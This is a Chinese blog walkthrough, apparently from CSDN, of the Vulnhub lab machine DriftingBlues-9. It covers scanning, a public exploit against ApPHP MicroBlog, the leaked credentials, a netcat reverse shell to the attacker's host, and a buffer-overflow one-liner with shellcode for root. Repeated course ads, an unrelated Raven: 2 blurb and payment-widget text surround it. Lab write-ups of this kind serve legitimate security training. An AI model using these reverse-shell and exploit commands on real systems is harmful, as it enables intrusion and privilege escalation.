看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-9_driftingblues9(1)

img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上软件测试知识点,真正体系化!

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

需要这份系统化的资料的朋友,可以戳这里获取

使用命令:nmap -sS -A -T4 -n 192.168.205.145

在这里插入图片描述
开启了80端口和111端口 老样子先访问80端口 直接查看源代码 发现了ApPHP MicroBlog 版本 为 v.1.0.1(第一次遇到)
在这里插入图片描述
在这里插入图片描述

②:漏洞利用:

使用searchsploit 搜索相关漏洞 第二个就可以利用

在这里插入图片描述
使用命令将利用的脚本复制到本地:searchsploit -m php/webapps/33070.py

使用python2 执行脚本:python2 ./33070.py http://192.168.205.145
在这里插入图片描述

发现了数据库信息 里面有账号和密码 分别是:clapton/yaraklitepe

使用命令:ls /home 发现和数据用户一样 也可以 cat /etc/passwd 查看是否有ncwhish nc
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

③:反弹shell:

kali 开启 nc 监听:nc -lvp 6666

shell 执行:nc 192.168.205.133 6666 -e /bin/bash

使用命令交互shellpython -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述
尝试切换用户 :clapton / yaraklitepe 获取到了第一个flag

在这里插入图片描述

④:缓冲区溢出提权:

这里给的提示 缓冲区才是解决方法(什么缓冲区!!!第一次遇到不会pwn)
在这里插入图片描述

for i in {1..10000}; do (./input $(python -c 'print("A" \* 171 + "\x10\x0c\x97\xbf" + "\x90"\* 1000 + "\x31\xc9\xf7\xe1\x51\xbf\xd0\xd0\x8c\x97\xbe\xd0\x9d\x96\x91\xf7\xd7\xf7\xd6\x57\x56\x89\xe3\xb0\x0b\xcd\x80")')); done

具体参考:https://www.ngui.cc/article/show-373956.html
https://blog.csdn.net/qq_32261191/article/details/117908644

⑤:获取flag:

在这里插入图片描述

至此获取到了所有得flag,渗透测试结束。

Vulnhub靶机渗透总结:

①:searchsploit 工具的用法
②:RCE 漏洞利用
③:缓冲区溢出提权(因为没基础所以还不怎么会 后续在学)

这也是DriftingBlues系列最后一个靶机的学习啦,希望大家也可以学习到新的一些知识点和一些渗透测试思路
最后创作不易 希望对大家有所帮助!!

img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上软件测试知识点,真正体系化!

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

需要这份系统化的资料的朋友,可以戳这里获取

路线、讲解视频,并且后续会持续更新**

需要这份系统化的资料的朋友,可以戳这里获取

Raven: 2是一台中级难度的boot2root虚拟机,目标是获取四个标志(flag)。Raven Security在多次遭受入侵后,采取了额外措施来加固他们的web服务器,以防止黑客入侵。你可以在Vulnhub上找到Raven: 2的ova文件,并使用VirtualBox打开。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [vulnhub靶机raven2](https://blog.csdn.net/weixin_52450702/article/details/127811079)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [vulnhub靶机——RAVEN: 2](https://blog.csdn.net/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)](https://download.csdn.net/download/weixin_38717843/14052717)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值